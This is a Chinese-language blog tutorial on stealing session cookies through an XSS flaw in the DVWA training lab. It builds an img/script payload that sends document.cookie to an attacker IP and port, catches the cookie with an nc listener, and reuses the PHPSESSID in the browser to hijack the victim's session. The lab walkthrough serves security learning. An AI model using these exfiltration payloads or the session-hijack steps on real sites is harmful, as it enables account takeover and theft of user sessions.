首页 > 其他分享 >使用XSS漏洞获取cookies

使用XSS漏洞获取cookies

时间:2023-01-06 14:01:07浏览次数:38  
标签:XSS cookies get 标签 发送 漏洞 cookie 使用 8023

使用XSS漏洞获取cookies

一、前期准备

火狐为受害者,已经登陆到DVWA

chrome为攻击者,没有登陆权限/可以登录,但权限不如火狐高

在火狐输入xss语句获取cookie,使用chrome登录其账号

二、构造xss语句

想要把cookie发送给攻击者,所以首先要想到使用get、post请求(下面是用get举例)

1.构造初步代码

攻击者ip为192.168.136.149:8023,而想要发送的内容是cookie,所以先构造出一个简单的url:192.168.136.149:8023/?cookie

2.发送get请求

发送get请求可使用的方法有:location重定向(访问当前页面的时候重定向到192.168.136.149:8023/?cookie这个页面)、img标签、script标签等

这里我们使用img标签

img标签传输原理:img标签传输分为两步,首先img src=”url“ 先向url发送一个get请求,之后把请求的内容当作图片展示在页面上

实际上我们只需要其第一步——向src后的url发送一个get请求

发送的代码

1

发送后无法识别图片(正常现象)

2

接收端我们使用nc去监听,其中接收端与发送端(xss语句)的端口要一致【让要攻击代码把cookie发送到8023端口,接收也在8023】

3

监听成功,但只收到了cookie的字符不是真正的cookie

4

说明发送端中的cookie只是数据不是指令

3.构造xss语句

<img src="http://192.168.136.149:8023/?cookie">中引号包括的部分为完整数据,所以不能直接使用document.cookie,需要进行区分

5

使用单引号将数据包含起来,再将三个字符串用加号拼接(’a‘ + ‘b’ = ‘ab’ ,JavaScript中字符串相加),变成【数据+指令执行的结果+数据】的形式

6

因为document.cookie是个JavaScript指令,在html页面中必须要用<script>标签包裹起来才可以运行(和alert一样,必须要<script>alert(a);</script>才可以使用)

7

接下来需要将内容写入html页面中,使用document.write

8

总结:最外层的<script>标签是告诉浏览器,内部的东西要当作JavaScript脚本运行

document.wirte是将括号里的内容写到html页面当中去

在dvwa输入构造好的payload,再用nc监听

11

成功获取到火狐的cookie内容

9

三、使用cookie信息登录

使用chrome,f12打开控制面板->application->cookies->PHPSESSID

10

双击PHPSESSID,将nc监听到的PHPSESSID粘贴替换即可,security也可一起更改

此时再去访问DVWA即可成功登录

12

标签:XSS,cookies,get,标签,发送,漏洞,cookie,使用,8023
From: https://www.cnblogs.com/vinslow/p/17030204.html

相关文章

  • Dubbo Provider远程代码执行漏洞(CVE-2020-1948)
    漏洞编号CVE-2020-1948漏洞原理Dubbo协议默认采用Hessian作为序列化反序列化方式,而Hessian存在危险的反序列化漏洞,攻击者发送未经验证的服务名或方法名的RPC请求,使Dub......
  • weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)
    漏洞描述WeblogicWLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行weblogic中间件的主机进行攻击。受影响weblogic版本10.3.6.0.0,12.1.3.0.0,12.2.1.1.......
  • weblogic-SSRF漏洞
    漏洞出现位置与解决方法Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war......
  • weblogic未授权远程命令执行漏洞
    漏洞编号weblogic未授权漏洞:CVE-2020-14882weblogic命令执行漏洞:CVE-2020-14883漏洞说明CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14......
  • Tomcat文件包含及文件读取漏洞(CVE-2020-1938)
    漏洞影响CVE-2020-1938ApacheTomcat9.x<9.0.31ApacheTomcat8.x<8.5.51ApacheTomcat7.x<7.0.100ApacheTomcat6.x漏洞利用前提目标机器开启AJPConnector服务......
  • Kali搭建Vulhub漏洞复现环境
    Kali搭建Vulhub漏洞复现环境一、前言Vulhub是一个基于Docker和Docker-compose的漏洞环境集合,可以帮助我们很方便的搭建包含有各种漏洞的靶场环境,从而使得我们更加方面的......
  • Apache HTTPD 换行解析漏洞(CVE-2017-15715)
    1.漏洞原理ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,a.php\x0a将被按照PHP后缀进行解析,导致绕过......
  • 工控协议网关漏洞挖掘与攻击
    ​本文系原创转载请说明出处:信安科研人pleasesubscribemyofficialwechat:信安科研人获取更多安全资讯 原文:IndustrialProtocolGatewaysUnderAnalysis〇摘......
  • osv-scanner google 开源漏洞扫描工具
    osv-scanner是google基于golang编写的开源漏洞扫描工具,支持基于osv数据库的扫描,生态比较好支持的扫描模式lockfilessbomsgit项目说明osv-scanner支持的扫描......
  • CVE-2022-26923 Windows域提权漏洞
    前言ActiveDirectory域服务,是一种目录服务,提供了存储目录数据信息以及用户相关的一些密码,电话号码等等一些数据信息,且可让用户和管理员使用这些数据,有利于域管理员对用......